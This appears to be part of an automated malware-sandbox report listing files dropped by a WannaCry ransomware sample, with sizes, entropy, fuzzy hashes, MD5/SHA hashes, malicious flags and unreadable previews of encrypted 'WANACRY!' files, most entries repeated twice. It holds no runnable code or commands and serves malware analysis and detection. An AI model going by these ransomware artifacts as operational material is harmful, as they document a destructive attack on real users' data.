                                                                              Preview:WANACRY!....4p...^.!......8..5.Ix.....QPGv.5K=.a...*|5q.f...>Su.O..Z.!...C$.QU...kN.X..r4..q.?.$..%C...Wd.K.I.E..;.../...?....a.7"..Y"V{t..8qFu.o.......^-..'.....O.1.%[...S........`E..#...z?.^...T...@...P...O...'.....{.2....2....X.....p....7R........C@>............3.Z.R..S.u.K....9o)...`..4.L..A....y....E.....z..8ye.Y!...2..H......G,.'.d0m.[z!0-H{...........[?.2.....Bf9..=.....j+U..6$L.......I#:B........~..7.....m....AC.......0.... .:...............JB.d.-.....o)....WX....!.1.wS....&.y..-..W.<..d.o..-[.....:8..y.l.eT...LC.(....I<....N.....~i........@..]\.s37..C.H...V..3......y.A'L7#.B..n..hs.U<.N...Fn~7]..^.Z..#~.5..>..d.I)..j(o...~q.a..&..E$[3z.......%..Q....+ .^Y.x.M.Dl....?..|+\.z.........M9...|...P.3a.....y.....TK....y...C.Mq..OG..KQ..:...g.1....... .|.#z,v.9q.1.....I.....b..U6...(.}.-...!.S-.i...G.......c.*...9...5.....-...3.............../,..d.......m.G.cP..8....O......8.=.J......i...|J.......`.{..=3..d..9_i.n..&._.L.;...9W.!%..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.1174176683437596
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEefGmnKjy2djv7DxiK78oXAh20KPy0PqmoKGFHjnHIy3ZpkGh+c:bkEedKVv7DxivG0OytVlIMZp9
                                                                              MD5:8531E83B5859FDC3D255E5C1C6818E43
                                                                              SHA1:9125A5E19D4EF604E84BF128AF3A24ACF8B0EE3C
                                                                              SHA-256:8D472A2416B7EE1264D3016FD2EA211DE4073283AC99662FB1FCFC0B906DC9FA
                                                                              SHA-512:C56C22A29C458D11177AA75921B243962F1A1ED99B7B2001342B60A52A91AEC6299D3CE507502B855702EF82FF49E5B48382ED3DFADBCABCC7198FAA1C0C6B4C
                                                                              Malicious:false
                                                                              Preview:WANACRY!....S..]).O.o...!?....^Z.M24...k.Q.x...E...?..1...%...%U.....>..qJ.L".wWqo...t...F.......E........gfOQ8N..........x.n.<.1.o......*.f.....W.....k...L......9.*kQ..&...4|..[.....P@...,...........V..H{{.e..Mn..BiY...S...'.....A..o..Zz..@.*.......Jq.mF...................)...|V.L..f
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.1174176683437596
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEefGmnKjy2djv7DxiK78oXAh20KPy0PqmoKGFHjnHIy3ZpkGh+c:bkEedKVv7DxivG0OytVlIMZp9
                                                                              MD5:8531E83B5859FDC3D255E5C1C6818E43
                                                                              SHA1:9125A5E19D4EF604E84BF128AF3A24ACF8B0EE3C
                                                                              SHA-256:8D472A2416B7EE1264D3016FD2EA211DE4073283AC99662FB1FCFC0B906DC9FA
                                                                              SHA-512:C56C22A29C458D11177AA75921B243962F1A1ED99B7B2001342B60A52A91AEC6299D3CE507502B855702EF82FF49E5B48382ED3DFADBCABCC7198FAA1C0C6B4C
                                                                              Malicious:false
                                                                              Preview:WANACRY!....S..]).O.o...!?....^Z.M24...k.Q.x...E...?..1...%...%U.....>..qJ.L".wWqo...t...F.......E........gfOQ8N..........x.n.<.1.o......*.f.....W.....k...L......9.*kQ..&...4|..[.....P@...,...........V..H{{.e..Mn..BiY...S...'.....A..o..Zz..@.*.......Jq.mF...................)...|V.L..f
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.2140198865169065
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkERrdZMc8O5Vur78SLczqkvUNk4TtrbksrvY+4migZgMs0vJUlUjlGc5n:bkEN0cjVur78rG6UrbkuvY+4GZmgXjl5
                                                                              MD5:16CE45420E1EF8927C828EE308B9DC5D
                                                                              SHA1:29135AA88E8ABB87CB0AA293854AC3B987E36001
                                                                              SHA-256:364EFF4DF52B52608FA6889E2AB9BFEADB7AC371A8E2EA67EE304AD764D984A1
                                                                              SHA-512:C876F90B8D01683E73D5C2ABB266C0DEFBFE5DADC62E75CD63C0C70D9561771D55A4E7931BA0360C4B7271B2DFA3AFC2D9BAD9925326315205E07EB0967CCC24
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....x.x6...vF..$..9k........EW7o.....8l.T^...>.{.g. ....,"q.....kt..F+o...#.+'...=..`..7Qk...:..^..X..7Yl.E<..?..9.?...L/.5o[......< ~....AOi%h).v..L&].C...........LT.4.........W._....L/.1j..l..E..Oo....F..v.`..*O.....OMX......:.W..X.H.v&..L.J.5?...............R..i^.u...q.\&
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.2140198865169065
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkERrdZMc8O5Vur78SLczqkvUNk4TtrbksrvY+4migZgMs0vJUlUjlGc5n:bkEN0cjVur78rG6UrbkuvY+4GZmgXjl5
                                                                              MD5:16CE45420E1EF8927C828EE308B9DC5D
                                                                              SHA1:29135AA88E8ABB87CB0AA293854AC3B987E36001
                                                                              SHA-256:364EFF4DF52B52608FA6889E2AB9BFEADB7AC371A8E2EA67EE304AD764D984A1
                                                                              SHA-512:C876F90B8D01683E73D5C2ABB266C0DEFBFE5DADC62E75CD63C0C70D9561771D55A4E7931BA0360C4B7271B2DFA3AFC2D9BAD9925326315205E07EB0967CCC24
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....x.x6...vF..$..9k........EW7o.....8l.T^...>.{.g. ....,"q.....kt..F+o...#.+'...=..`..7Qk...:..^..X..7Yl.E<..?..9.?...L/.5o[......< ~....AOi%h).v..L&].C...........LT.4.........W._....L/.1j..l..E..Oo....F..v.`..*O.....OMX......:.W..X.H.v&..L.J.5?...............R..i^.u...q.\&
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):37432
                                                                              Entropy (8bit):7.995411904564757
                                                                              Encrypted:true
                                                                              SSDEEP:768:5hHUD8oHaIIo5pw1YdEVMBDAnrkf56PHJS68jK2yIpELphoJj:5hHUnHa8CaE+BGu5+pl8jK/iEFhuj
                                                                              MD5:7A8757BD8BFEE805413D42F1DE4518A2
                                                                              SHA1:EC6BBB23B547F7EC754368F2D4F5D753527514AF
                                                                              SHA-256:815C55487C2494D156D6ABA3B64C0C982E347B819B03F4ADDE8C092E90B866D5
                                                                              SHA-512:470AB2D4FE8BB91EBB46D0F9986BF44FD3ADEEF4062475EC771ACB11FF3489C7FA97F11A438D808CA66528D26C26B878C7904330CC159017BD05CC5A34549622
                                                                              Malicious:true
                                                                              Preview:WANACRY!....=.E.4x#.{E|",F.&...=)...........4...'.!..-.f....+m..4N.2..2.z..N...w<Ix..8*..Xe.E.:.9...bj....*..X.3..cn..t.2....D..-=Q..|.m....t-x^....?2.*.A#.o...%..l...ME.H.,....Ya4...b....Y`sc4,1.t.@Q..<duT.5....].i..%....{#......_y...;.Kh.....h.......!.A..............$w.B.#$G..m..3......*[...o....2.].B...4..2...#.@...w.5.;.]0OS..Q.>..;gV.^7.'..S..6.!.U.....l..|w....;\..j}.\..[".+..5.p+...B....8.S.0.xS4/?...v......b@,..`|w..#'..D...3.\....C..k....f.u...T..&..H..5.1.l....W.4...f..72..$q..(/l*.:..=...........<.m)G..r...w..m.....9..SO...;o$........+.J)uR.M_..k..1..cq)....[.+yu..{.+.%..U..............^.o../...J...d...dW.....].E.SJ...%.PM.:.<..n.OiO.....JL.8.*Q\Q...)...B..N.qc.$......../..:;_0.`...fEN...~..(.CR.~.../...v... ..HW.s.Y.DA}..z..p...GOJ.....9.9:y.G....N....'..."|..)m.........gX...n......]W.+.@!eF..9..Hp...v; -%...]=.O...\U1rP.44f{.G.HzOl..A..@r.k.....H.P.Q(..t2h!..?J.Vr....).~{.5@..>.0....!....m..P.0t./.j...~..%..8......(....1`...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):37432
                                                                              Entropy (8bit):7.995411904564757
                                                                              Encrypted:true
                                                                              SSDEEP:768:5hHUD8oHaIIo5pw1YdEVMBDAnrkf56PHJS68jK2yIpELphoJj:5hHUnHa8CaE+BGu5+pl8jK/iEFhuj
                                                                              MD5:7A8757BD8BFEE805413D42F1DE4518A2
                                                                              SHA1:EC6BBB23B547F7EC754368F2D4F5D753527514AF
                                                                              SHA-256:815C55487C2494D156D6ABA3B64C0C982E347B819B03F4ADDE8C092E90B866D5
                                                                              SHA-512:470AB2D4FE8BB91EBB46D0F9986BF44FD3ADEEF4062475EC771ACB11FF3489C7FA97F11A438D808CA66528D26C26B878C7904330CC159017BD05CC5A34549622
                                                                              Malicious:true
                                                                              Preview:WANACRY!....=.E.4x#.{E|",F.&...=)...........4...'.!..-.f....+m..4N.2..2.z..N...w<Ix..8*..Xe.E.:.9...bj....*..X.3..cn..t.2....D..-=Q..|.m....t-x^....?2.*.A#.o...%..l...ME.H.,....Ya4...b....Y`sc4,1.t.@Q..<duT.5....].i..%....{#......_y...;.Kh.....h.......!.A..............$w.B.#$G..m..3......*[...o....2.].B...4..2...#.@...w.5.;.]0OS..Q.>..;gV.^7.'..S..6.!.U.....l..|w....;\..j}.\..[".+..5.p+...B....8.S.0.xS4/?...v......b@,..`|w..#'..D...3.\....C..k....f.u...T..&..H..5.1.l....W.4...f..72..$q..(/l*.:..=...........<.m)G..r...w..m.....9..SO...;o$........+.J)uR.M_..k..1..cq)....[.+yu..{.+.%..U..............^.o../...J...d...dW.....].E.SJ...%.PM.:.<..n.OiO.....JL.8.*Q\Q...)...B..N.qc.$......../..:;_0.`...fEN...~..(.CR.~.../...v... ..HW.s.Y.DA}..z..p...GOJ.....9.9:y.G....N....'..."|..)m.........gX...n......]W.+.@!eF..9..Hp...v; -%...]=.O...\U1rP.44f{.G.HzOl..A..@r.k.....H.P.Q(..t2h!..?J.Vr....).~{.5@..>.0....!....m..P.0t./.j...~..%..8......(....1`...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.136325556676529
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEy7p8qBwGuaYPIDK+qSItCfxNosZx16lBVGyHwh1ODl4DB:bkE08qAFIdqSnfxFxkRZL52
                                                                              MD5:92D04978A56BB9649F8132E435962CFF
                                                                              SHA1:6FD52D8B996ABF3841B415BF0E528C77A5AC4723
                                                                              SHA-256:1C96858B39A10E09F5FA75DA8359117F1BA6106BEFB4CC91B89196EE3F6A254B
                                                                              SHA-512:5FEAFA047BF1AB0AD3AC79540CB805BF11D31B8A6E7527FB62B29EDD1C747847856D0C7B1158EC7EFB79798B3B599E87B2ACF9DD8894F9C02B9827245461D3EA
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....;.^..:.@......"d......4.Q.Z.~......u....p.......H.C\.T/>..$..#YB(.f..t..H.*...r..Q.Q.Mw.t...>0An5m....tA@.......S._...xW..5k...B.j..e...a.|._V..u....+....%.. z....Ty.H.l....'.....X......Mml..N.Qy.Uom.-..\..qBu.....7v^...5.M.9F"kj,..e......D=GS..O.............B.tQ..Q ....9.7
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.136325556676529
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEy7p8qBwGuaYPIDK+qSItCfxNosZx16lBVGyHwh1ODl4DB:bkE08qAFIdqSnfxFxkRZL52
                                                                              MD5:92D04978A56BB9649F8132E435962CFF
                                                                              SHA1:6FD52D8B996ABF3841B415BF0E528C77A5AC4723
                                                                              SHA-256:1C96858B39A10E09F5FA75DA8359117F1BA6106BEFB4CC91B89196EE3F6A254B
                                                                              SHA-512:5FEAFA047BF1AB0AD3AC79540CB805BF11D31B8A6E7527FB62B29EDD1C747847856D0C7B1158EC7EFB79798B3B599E87B2ACF9DD8894F9C02B9827245461D3EA
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....;.^..:.@......"d......4.Q.Z.~......u....p.......H.C\.T/>..$..#YB(.f..t..H.*...r..Q.Q.Mw.t...>0An5m....tA@.......S._...xW..5k...B.j..e...a.|._V..u....+....%.. z....Ty.H.l....'.....X......Mml..N.Qy.Uom.-..\..qBu.....7v^...5.M.9F"kj,..e......D=GS..O.............B.tQ..Q ....9.7
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.169434573770379
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkE3LVCyr4EuEvsU67pswpTPbb9k3tU8kj2YSrgW1frMH:bkE7EUQp9T39k3tUHKYSr/q
                                                                              MD5:309EAB226A812A2AD2BB9C6DF5F66698
                                                                              SHA1:5C568E91A12BA4E2AF26C8F0C1E35EEEE08D38F9
                                                                              SHA-256:E2A88672D379E8A20A511E5ACCC6CCF3285D1413C0A651824A096DB1AF292343
                                                                              SHA-512:E7E723304A90AAFC04D6DBA25386558238EF6F661484162BA856576041C7252C3EF4F6EFCFD0020A8146AA5CCBEA38D82EF7017956F5EAE72D61AAE52B4E7CE1
                                                                              Malicious:false
                                                                              Preview:WANACRY!....l...7..k.-..pZ.H......]..9.I....I/...z..6...$......9adg=..4Rf^...u....e..m............n.....R...x.....O.'...r...UU..g.v.....o[p.[A...G.....5....A~.................U..bU..\...%....G..!.[O..&./.ar..b..&...^>h/]..0.;.nw...|.x.%.I.....-..K...E............. ..../......E).
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.169434573770379
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkE3LVCyr4EuEvsU67pswpTPbb9k3tU8kj2YSrgW1frMH:bkE7EUQp9T39k3tUHKYSr/q
                                                                              MD5:309EAB226A812A2AD2BB9C6DF5F66698
                                                                              SHA1:5C568E91A12BA4E2AF26C8F0C1E35EEEE08D38F9
                                                                              SHA-256:E2A88672D379E8A20A511E5ACCC6CCF3285D1413C0A651824A096DB1AF292343
                                                                              SHA-512:E7E723304A90AAFC04D6DBA25386558238EF6F661484162BA856576041C7252C3EF4F6EFCFD0020A8146AA5CCBEA38D82EF7017956F5EAE72D61AAE52B4E7CE1
                                                                              Malicious:false
                                                                              Preview:WANACRY!....l...7..k.-..pZ.H......]..9.I....I/...z..6...$......9adg=..4Rf^...u....e..m............n.....R...x.....O.'...r...UU..g.v.....o[p.[A...G.....5....A~.................U..bU..\...%....G..!.[O..&./.ar..b..&...^>h/]..0.;.nw...|.x.%.I.....-..K...E............. ..../......E).
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):37432
                                                                              Entropy (8bit):7.995057304339566
                                                                              Encrypted:true
                                                                              SSDEEP:768:CFv4yx64vQQQl7TS9s6Z6PVOHtZPr049DyTb6Uzi7vZ:wv4F44KO/PVOjYqUzirZ
                                                                              MD5:136000B5A05F633A46A968EA926A8057
                                                                              SHA1:58488ECEFD7E1F6F386D1DDF00074FE858485830
                                                                              SHA-256:EADF390B892138196F4F5A4165118D463EEB611522F996F5B8407823BAA3DD26
                                                                              SHA-512:0A23FD6DFA0D21E5E8AB63B8BBFF6F3490C9D35F803EFD90614E217AB17EC19BAA469ACB8E94562B1D5E9264C8FD13BDC9BB0513709984F316433C7D2EC6DA77
                                                                              Malicious:true
                                                                              Preview:WANACRY!....g..\..............h.L+.#J..o.6...Juu......-6......na.~...3....d.\.(Sp.4I..(..T.............xH..~.M.%y......R.g@..G....A..U..F...;..:..9K..Z.73]..IG.M......=..w...x..(.@2..La...$.8..\.TZ........=._.".=...'Qm..]..T=. t..........q_3...z"..............w.Z..l.:.Ig.p2.....iK(...,]...#_1~g.c.F..|.l._.Va .t/...p....4..r._....T....X..J...Ls7..#......(W/$.!AX-.......G.2..>3. ...?......e*.+z./b-o"F%.[+......nn... .."ts.R."M..K.l...2.NB..Q...xC.yP2R}......BU6...n....p...^[sq..C~*.=:.Do.......1.HE..WsKd.PF....$Z...L.f..|.....^.r.X..Vg.@.....B...6[.F.f.......1......A=..3.h.x~.\...L.C.5.rt..8..m..Om..+..W.&...;.1.!.A....\s...X.A!."V.$..R.%8.k.@X.].J!Ru..3.m..P.C.r........J...m....3M.....X...6..z>?:R5t.X.......q..3eR.Ea..;.9.W..~.N`R..M.....N...; (.5....VY.x..` ;......[..N.t.$P.bZ.S..51.wn....V.p.PK.....U.t..8..f)..[Z..fL.._..Hz#[Yr.f.`........e.w.6..b....B.n....z.#.....9+...K..".....CV.PTp.uI.t....1@4.FV.@t...A.}.......R.L......-f
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):37432
                                                                              Entropy (8bit):7.995057304339566
                                                                              Encrypted:true
                                                                              SSDEEP:768:CFv4yx64vQQQl7TS9s6Z6PVOHtZPr049DyTb6Uzi7vZ:wv4F44KO/PVOjYqUzirZ
                                                                              MD5:136000B5A05F633A46A968EA926A8057
                                                                              SHA1:58488ECEFD7E1F6F386D1DDF00074FE858485830
                                                                              SHA-256:EADF390B892138196F4F5A4165118D463EEB611522F996F5B8407823BAA3DD26
                                                                              SHA-512:0A23FD6DFA0D21E5E8AB63B8BBFF6F3490C9D35F803EFD90614E217AB17EC19BAA469ACB8E94562B1D5E9264C8FD13BDC9BB0513709984F316433C7D2EC6DA77
                                                                              Malicious:true
                                                                              Preview:WANACRY!....g..\..............h.L+.#J..o.6...Juu......-6......na.~...3....d.\.(Sp.4I..(..T.............xH..~.M.%y......R.g@..G....A..U..F...;..:..9K..Z.73]..IG.M......=..w...x..(.@2..La...$.8..\.TZ........=._.".=...'Qm..]..T=. t..........q_3...z"..............w.Z..l.:.Ig.p2.....iK(...,]...#_1~g.c.F..|.l._.Va .t/...p....4..r._....T....X..J...Ls7..#......(W/$.!AX-.......G.2..>3. ...?......e*.+z./b-o"F%.[+......nn... .."ts.R."M..K.l...2.NB..Q...xC.yP2R}......BU6...n....p...^[sq..C~*.=:.Do.......1.HE..WsKd.PF....$Z...L.f..|.....^.r.X..Vg.@.....B...6[.F.f.......1......A=..3.h.x~.\...L.C.5.rt..8..m..Om..+..W.&...;.1.!.A....\s...X.A!."V.$..R.%8.k.@X.].J!Ru..3.m..P.C.r........J...m....3M.....X...6..z>?:R5t.X.......q..3eR.Ea..;.9.W..~.N`R..M.....N...; (.5....VY.x..` ;......[..N.t.$P.bZ.S..51.wn....V.p.PK.....U.t..8..f)..[Z..fL.._..Hz#[Yr.f.`........e.w.6..b....B.n....z.#.....9+...K..".....CV.PTp.uI.t....1@4.FV.@t...A.}.......R.L......-f
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.006802933610188
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEHFwS6kEPHFmLWJ7O+4A1a9/W0VQkDAjBhn8cToC63DCSLzvR/EdD:bkEHFZ6kEPHwW7uIIQkDcnhToPQ
                                                                              MD5:36F1B0E29A220993B19ADC217985C9B8
                                                                              SHA1:2D6EB2FA17A513E094E20319948319E774A8622C
                                                                              SHA-256:4ACDEB448E561E83F9F29B2D92096436EF3F10BA591A1B212A4A82FB6A8E740D
                                                                              SHA-512:D3E382C5960814BA422BF21BEFEF7AC8CF3FEF670E994D9AD53B0EE2327CE0F13BCB3D3657C33D81A054A22A97A9A34278B0C8EBB33A931AF65F2CEA26B7080C
                                                                              Malicious:false
                                                                              Preview:WANACRY!........#.m..A.ki.v........#8...mq.S..#"........\.`.......!.i...\..6...Qq5.....k...&..o..M...%(...\...e..o...!U..P..W......u...q.>...&..M....&...%.....w..J.u...Q.m.p....8....C.%..Q 6.gO...I.k..g.l...s.v.Pc..B..f.:...7.;.a.sQ....1O...IR.=...:.2%................5.^i.e.;.J7T.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.006802933610188
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEHFwS6kEPHFmLWJ7O+4A1a9/W0VQkDAjBhn8cToC63DCSLzvR/EdD:bkEHFZ6kEPHwW7uIIQkDcnhToPQ
                                                                              MD5:36F1B0E29A220993B19ADC217985C9B8
                                                                              SHA1:2D6EB2FA17A513E094E20319948319E774A8622C
                                                                              SHA-256:4ACDEB448E561E83F9F29B2D92096436EF3F10BA591A1B212A4A82FB6A8E740D
                                                                              SHA-512:D3E382C5960814BA422BF21BEFEF7AC8CF3FEF670E994D9AD53B0EE2327CE0F13BCB3D3657C33D81A054A22A97A9A34278B0C8EBB33A931AF65F2CEA26B7080C
                                                                              Malicious:false
                                                                              Preview:WANACRY!........#.m..A.ki.v........#8...mq.S..#"........\.`.......!.i...\..6...Qq5.....k...&..o..M...%(...\...e..o...!U..P..W......u...q.>...&..M....&...%.....w..J.u...Q.m.p....8....C.%..Q 6.gO...I.k..g.l...s.v.Pc..B..f.:...7.;.a.sQ....1O...IR.=...:.2%................5.^i.e.;.J7T.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.140120214284047
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEQ9k52dQ7aATH2nPtrb67wcaYEdxkZFc6Io:bkEuk520a2QPtrywJYEMZyzo
                                                                              MD5:3F7EBE02BD4D4A90E99047E48A41B59B
                                                                              SHA1:066FF270B48E0B385FED5166D0145C1D8C328C6D
                                                                              SHA-256:A1EF2ACBE80F415A1E22E6BD5044CFE817141EF4377BDE4B83E5D7283B988720
                                                                              SHA-512:4777030940992B5D87BE78B7FA41BDEC219171F5B297EB638FB7DE438CED198AE457BE21A594CBCBC9F7BB2E9773805B218096353EA3F8C3F9335F7A0D5E3B9D
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....c..M_..g...v...fp.-C.3=....*(......#............I86.........i.....|..U.vm_T...P...S8Z...9..mC.]kE:.........6.......#j..2U.FD......Aa.:.).P... .?.U.)...\'}.k.w..aB......C..aa.._...-.....GQ;...G(..n8.^.i.c..@`.....L...5.g.........`...`P..jd..............G..o..Cz=..G..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.140120214284047
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEQ9k52dQ7aATH2nPtrb67wcaYEdxkZFc6Io:bkEuk520a2QPtrywJYEMZyzo
                                                                              MD5:3F7EBE02BD4D4A90E99047E48A41B59B
                                                                              SHA1:066FF270B48E0B385FED5166D0145C1D8C328C6D
                                                                              SHA-256:A1EF2ACBE80F415A1E22E6BD5044CFE817141EF4377BDE4B83E5D7283B988720
                                                                              SHA-512:4777030940992B5D87BE78B7FA41BDEC219171F5B297EB638FB7DE438CED198AE457BE21A594CBCBC9F7BB2E9773805B218096353EA3F8C3F9335F7A0D5E3B9D
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....c..M_..g...v...fp.-C.3=....*(......#............I86.........i.....|..U.vm_T...P...S8Z...9..mC.]kE:.........6.......#j..2U.FD......Aa.:.).P... .?.U.)...\'}.k.w..aB......C..aa.._...-.....GQ;...G(..n8.^.i.c..@`.....L...5.g.........`...`P..jd..............G..o..Cz=..G..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1426184
                                                                              Entropy (8bit):7.999875438293023
                                                                              Encrypted:true
                                                                              SSDEEP:24576:ud5dX3T6j91GtigM0pB7QEhIyQENh6v+IBVxEIAzEOa3p4jJJEevdgJsxl:sdHT6atigpvTbQgiVaIAzE3WJJEevhT
                                                                              MD5:D3473C64D0F3EFC41C48E0FA3C125947
                                                                              SHA1:A26718BEFC6812624BB1C79BE8799867610745CC
                                                                              SHA-256:DB297107B9AEE8D9CD345597E5326FC4088DA5D00CD457FAAB341AB73963FE88
                                                                              SHA-512:187620FDFF14F9833A26C55E7DC92C0B2263D1A2D04252AF0E55236EFE1C87817B4CDCA31CAED2AA8654697C2810ECF5C0CA962F9816446865204F9CE87DEAA4
                                                                              Malicious:true
                                                                              Preview:WANACRY!.........b...+...$.X.......~........,.G..@.9sZ.;..{-..D^...{......;o.q....L..A..+...O..o.]0~.0..zS...^..6^...8..'....p.J..G.].........t..#H7...,d.2......z9.O.C..".z$.X.B..$.9S_.<X.....Y..2..iT.L7.,.;...h\...gU.8.P.d..>"..YX........)'.3....!C.8..|.................A......M{.>.X.FO...LqB..z...V..?.wG...p.....J`"S..j.zr7..%I..?.x..lEN....R........AAeb..{....U!..B.Y...8w7:...c>..T..o~.M..E.....d.,..*......B..E`.f.....i._.5..,...m..A>.H9....W.....y.H+D...\;d..q...3..hG..8.1....N.1......#......J...;...J...I...`.........%E?..u..K...%9d.V.UI.Y!.hx@..k..9..A.P.).1.E.g/.~..CA...S...3.....:U0f[..(5.(...}B....5...y.J.~......}.*C.R..^.z..<.5.&:..7./0@n.e.6SB...Yg...b<....;.M,d..X.......n........[..>.....y..,i....+........@-X4N(. ........".m..q......`.N.....c...(JS)W.Ei.gMs..4....d_...[U. .aL......._.P..s.......*.m~M..b.....m..t...8.jZh?..Z0..H4R........vEZl.P...^.5O...u....j/.&|.:..n.:..W..m..XW.?e....s....#8...:!.p.v....u0F?...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1426184
                                                                              Entropy (8bit):7.999875438293023
                                                                              Encrypted:true
                                                                              SSDEEP:24576:ud5dX3T6j91GtigM0pB7QEhIyQENh6v+IBVxEIAzEOa3p4jJJEevdgJsxl:sdHT6atigpvTbQgiVaIAzE3WJJEevhT
                                                                              MD5:D3473C64D0F3EFC41C48E0FA3C125947
                                                                              SHA1:A26718BEFC6812624BB1C79BE8799867610745CC
                                                                              SHA-256:DB297107B9AEE8D9CD345597E5326FC4088DA5D00CD457FAAB341AB73963FE88
                                                                              SHA-512:187620FDFF14F9833A26C55E7DC92C0B2263D1A2D04252AF0E55236EFE1C87817B4CDCA31CAED2AA8654697C2810ECF5C0CA962F9816446865204F9CE87DEAA4
                                                                              Malicious:true
                                                                              Preview:WANACRY!.........b...+...$.X.......~........,.G..@.9sZ.;..{-..D^...{......;o.q....L..A..+...O..o.]0~.0..zS...^..6^...8..'....p.J..G.].........t..#H7...,d.2......z9.O.C..".z$.X.B..$.9S_.<X.....Y..2..iT.L7.,.;...h\...gU.8.P.d..>"..YX........)'.3....!C.8..|.................A......M{.>.X.FO...LqB..z...V..?.wG...p.....J`"S..j.zr7..%I..?.x..lEN....R........AAeb..{....U!..B.Y...8w7:...c>..T..o~.M..E.....d.,..*......B..E`.f.....i._.5..,...m..A>.H9....W.....y.H+D...\;d..q...3..hG..8.1....N.1......#......J...;...J...I...`.........%E?..u..K...%9d.V.UI.Y!.hx@..k..9..A.P.).1.E.g/.~..CA...S...3.....:U0f[..(5.(...}B....5...y.J.~......}.*C.R..^.z..<.5.&:..7./0@n.e.6SB...Yg...b<....;.M,d..X.......n........[..>.....y..,i....+........@-X4N(. ........".m..q......`.N.....c...(JS)W.Ei.gMs..4....d_...[U. .aL......._.P..s.......*.m~M..b.....m..t...8.jZh?..Z0..H4R........vEZl.P...^.5O...u....j/.&|.:..n.:..W..m..XW.?e....s....#8...:!.p.v....u0F?...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):352008
                                                                              Entropy (8bit):7.999444234936006
                                                                              Encrypted:true
                                                                              SSDEEP:6144:QS8mYeqmu+ANQ0i6cCo9PdTk5jzPXIW1v+Y51XFluTE:lYLx+b03AczfIu5F
                                                                              MD5:D4A217C98B887D399D794E4DB9DA23D9
                                                                              SHA1:5722EB64FF0D0AFCC02040811E490AD9778B290D
                                                                              SHA-256:FC2AA47B6C5E5785075E294241E07C0D53E9EDAD25E135BB3C6B743A36A127C3
                                                                              SHA-512:CB0ED6EDDC25CDD3321644F9F349D7ABBD8C8049128D0D39C7EE0565A1C1D94407729DA8AFA6D55AED1D0D9B3780090534970348443A62D1D1C5730112371F9A
                                                                              Malicious:true
